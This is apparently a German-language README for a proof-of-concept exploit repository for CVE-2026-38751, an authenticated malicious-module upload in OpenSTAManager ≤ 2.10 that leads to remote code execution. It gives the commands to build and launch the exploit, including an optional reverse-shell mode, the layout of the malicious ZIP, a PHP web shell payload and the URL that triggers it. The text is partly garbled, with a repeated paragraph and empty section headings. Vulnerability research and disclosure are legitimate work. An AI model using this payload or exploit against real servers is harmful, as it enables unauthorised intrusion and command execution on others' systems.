
Dieses Repository enthält einen Proof-of-Concept-Exploit (PoC) für CVE-2026-38751, der OpenSTAManager ≤ 2.10 betrifft. Die Schwachstelle ermöglicht es einem authentifizierten Angreifer, über die Modul-Update-Funktionalität ein bösartiges Modul hochzuladen, was zu beliebigem Datei-Upload und Remote-Code-Ausführung (RCE) führt.
Dieses Repository enthält einen Proof-of-Concept-Exploit (PoC) für CVE-2026-38751, der OpenSTAManager ≤ 2.10 betrifft. Die Schwachstelle ermöglicht es einem authentifizierten Angreifer, über die Modul-Update-Funktionalität ein bösartiges Modul hochzuladen, was zu beliebigem Datei-Upload und Remote-Code-Ausführung (RCE) führt.
modules/aggiornamenti/upload_modules.php)Die Modul-Update-Funktionalität erlaubt authentifizierten Benutzern das Hochladen ZIP-basierter Module ohne ordnungsgemäße Validierung der Dateiinhalte oder Ausführungsbeschränkungen. Ein Angreifer kann ein bösartiges Modul mit PHP-Payloads erstellen, die anschließend im Web-Root abgelegt und über den Anwendungskontext ausgeführt werden. Dies führt zu:
##Auswirkungen Eine erfolgreiche Ausnutzung ermöglicht:
python exploit.py --build
Erzeugt:
update.zip
└── run/
├── MODULE
└── evil.php
python exploit.py <username> <password> <target_url>
Optionaler Reverse-Shell-Modus:
python exploit.py <username> <password> <target_url> --lhost <IP> --lport <PORT>
Beispiel-Payload
<?php
isset($_GET['cmd']) && system($_GET['cmd']);
?>
Bei Erfolg führt der folgende Endpunkt Systembefehle aus:
/modules/run/evil.php?cmd=id
Dieses Projekt ist für folgende Zwecke gedacht:
Verwenden Sie es nicht gegen Systeme ohne ausdrückliche Genehmigung.
Hinweise
Die Erkennung kann je nach Serverkonfiguration variieren. Einige Installationen deaktivieren möglicherweise die direkte PHP-Ausführung in Modulverzeichnissen. Das Timing der Modulaktivierung kann Wiederholungsversuche erfordern.
Danksagungen